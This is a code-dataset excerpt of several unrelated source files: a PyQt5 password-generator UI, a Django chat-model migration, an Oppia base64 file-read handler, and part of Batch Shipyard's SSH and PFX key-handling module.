" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.Generate.setObjectName("Generate")
self.UserInput = QtWidgets.QLineEdit(self.centralwidget)
self.UserInput.setGeometry(QtCore.QRect(190, 20, 191, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.UserInput.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.UserInput.setFont(font)
self.UserInput.setObjectName("UserInput")
self.Password = QtWidgets.QLineEdit(self.centralwidget)
self.Password.setGeometry(QtCore.QRect(200, 210, 141, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Password.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Password.setFont(font)
self.Password.setText("")
self.Password.setEchoMode(QtWidgets.QLineEdit.Password)
self.Password.setReadOnly(True)
self.Password.setObjectName("Password")
self.HideShow = QtWidgets.QPushButton(self.centralwidget)
self.HideShow.setGeometry(QtCore.QRect(350, 210, 31, 31))
self.HideShow.setStyleSheet("QPushButton {\n"
" color: #333;\n"
"\n"
" border-radius: 7px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.HideShow.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("../../Desktop/EYECLOSE.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.HideShow.setIcon(icon)
self.HideShow.setIconSize(QtCore.QSize(30, 30))
self.HideShow.setObjectName("HideShow")
self.Copy = QtWidgets.QPushButton(self.centralwidget)
self.Copy.setGeometry(QtCore.QRect(190, 250, 201, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Copy.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Copy.setFont(font)
self.Copy.setStyleSheet("QPushButton {\n"
" color: #333;\n"
" \n"
" border-radius: 13px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.Copy.setObjectName("Copy")
self.hexify = QtWidgets.QCheckBox(self.centralwidget)
self.hexify.setGeometry(QtCore.QRect(250, 180, 81, 21))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.hexify.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.hexify.setFont(font)
self.hexify.setObjectName("hexify")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 577, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.Algorithms.setCurrentText(_translate("MainWindow", "Select encryption algorithm"))
self.Algorithms.setItemText(0, _translate("MainWindow", "Select encryption algorithm"))
self.Algorithms.setItemText(1, _translate("MainWindow", "sha256"))
self.Algorithms.setItemText(2, _translate("MainWindow", "md5"))
self.Algorithms.setItemText(3, _translate("MainWindow", "sha224"))
self.Algorithms.setItemText(4, _translate("MainWindow", "sha1"))
self.Algorithms.setItemText(5, _translate("MainWindow", "sha512"))
self.Generate.setText(_translate("MainWindow", "GENERATE"))
self.Copy.setText(_translate("MainWindow", "COPY TO CLIPBOARD"))
self.hexify.setText(_translate("MainWindow", "Hexify?"))
self.HideShow.setIcon(QtGui.QIcon("Assets//EYECLOSE.png"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 2.234375 | 2 |
yxtx/myApp/migrations/0017_chat.py | wjh112233/yxtx | 0 | 1140 | # Generated by Django 3.0.2 on 2020-03-17 08:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myApp', '0016_usergroup_buyer'),
]
operations = [
migrations.CreateModel(
name='Chat',
fields=[
('id', models.CharField(max_length=31, primary_key=True, serialize=False)),
('chatinfo', models.CharField(max_length=20000)),
('shopid', models.CharField(max_length=30)),
('user1', models.CharField(max_length=50)),
('user2', models.CharField(max_length=50)),
('name1', models.CharField(max_length=50)),
('name2', models.CharField(max_length=50)),
],
),
]
| 1.976563 | 2 |
core/controllers/services.py | willingc/oh-missions-oppia-beta | 0 | 1141 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for miscellaneous services."""
__author__ = '<NAME>'
import base64
import json
from core.controllers import base
class FileReadHandler(base.BaseHandler):
"""Returns a base64-encoded ascii string with uploaded file's content."""
def post(self):
raw_file_content = self.request.get('file')
encoded_content = base64.b64encode(raw_file_content)
self.response.headers['Content-Type'] = 'application/json'
response = {
'base64_file_content': encoded_content,
}
self.response.out.write(json.dumps(response))
| 2.390625 | 2 |
convoy/crypto.py | hebinhuang/batch-shipyard | 0 | 1142 | <filename>convoy/crypto.py
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
PfxSettings = collections.namedtuple(
'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
# type: (None) -> str
"""Get SSH key prefix
:rtype: str
:return: ssh key prefix
"""
return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
# type: (None) -> str
"""Get remote fs SSH key prefix
:rtype: str
:return: ssh key prefix for remote fs
"""
return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
# type: (None) -> str
"""Generate an RDP password
:rtype: str
:return: rdp password
"""
return base64.b64encode(os.urandom(8))
def generate_ssh_keypair(export_path, prefix=None):
# type: (str, str) -> tuple
"""Generate an ssh keypair for use with user logins
:param str export_path: keypair export path
:param str prefix: key prefix
:rtype: tuple
:return: (private key filename, public key filename)
"""
if util.is_none_or_empty(prefix):
prefix = _SSH_KEY_PREFIX
privkey = pathlib.Path(export_path, prefix)
pubkey = pathlib.Path(export_path, prefix + '.pub')
if privkey.exists():
old = pathlib.Path(export_path, prefix + '.old')
if old.exists():
old.unlink()
privkey.rename(old)
if pubkey.exists():
old = pathlib.Path(export_path, prefix + '.pub.old')
if old.exists():
old.unlink()
pubkey.rename(old)
logger.info('generating ssh key pair to path: {}'.format(export_path))
subprocess.check_call(
['ssh-keygen', '-f', str(privkey), '-t', 'rsa', '-N', ''''''])
return (privkey, pubkey)
def check_ssh_private_key_filemode(ssh_private_key):
# type: (pathlib.Path) -> bool
"""Check SSH private key filemode
:param pathlib.Path ssh_private_key: SSH private key
:rtype: bool
:return: private key filemode is ok
"""
def _mode_check(fstat, flag):
return bool(fstat & flag)
if util.on_windows():
return True
fstat = ssh_private_key.stat().st_mode
modes = frozenset((stat.S_IRWXG, stat.S_IRWXO))
return not any([_mode_check(fstat, x) for x in modes])
def connect_or_exec_ssh_command(
remote_ip, remote_port, ssh_private_key, username, sync=True,
shell=False, tty=False, ssh_args=None, command=None):
# type: (str, int, pathlib.Path, str, bool, bool, tuple, tuple) -> bool
"""Connect to node via SSH or execute SSH command
:param str remote_ip: remote ip address
:param int remote_port: remote port
:param pathlib.Path ssh_private_key: SSH private key
:param str username: username
:param bool sync: synchronous execution
:param bool shell: execute with shell
:param bool tty: allocate pseudo-tty
:param tuple ssh_args: ssh args
:param tuple command: command
:rtype: int or subprocess.Process
:return: return code or subprocess handle
"""
if not ssh_private_key.exists():
raise RuntimeError('SSH private key file not found at: {}'.format(
ssh_private_key))
# ensure file mode is set properly for the private key
if not check_ssh_private_key_filemode(ssh_private_key):
logger.warning(
'SSH private key filemode is too permissive: {}'.format(
ssh_private_key))
# execute SSH command
ssh_cmd = [
'ssh', '-o', 'StrictHostKeyChecking=no',
'-o', 'UserKnownHostsFile={}'.format(os.devnull),
'-i', str(ssh_private_key), '-p', str(remote_port),
]
if tty:
ssh_cmd.append('-t')
if util.is_not_empty(ssh_args):
ssh_cmd.extend(ssh_args)
ssh_cmd.append('{}@{}'.format(username, remote_ip))
if util.is_not_empty(command):
ssh_cmd.extend(command)
logger.info('{} node {}:{} with key {}'.format(
'connecting to' if util.is_none_or_empty(command)
else 'executing command on', remote_ip, remote_port, ssh_private_key))
if sync:
return util.subprocess_with_output(ssh_cmd, shell=shell)
else:
return util.subprocess_nowait_pipe_stdout(
ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a private key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = <PASSWORD>('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a public key pem file from a pfx
:param str pfxfile: pfx file
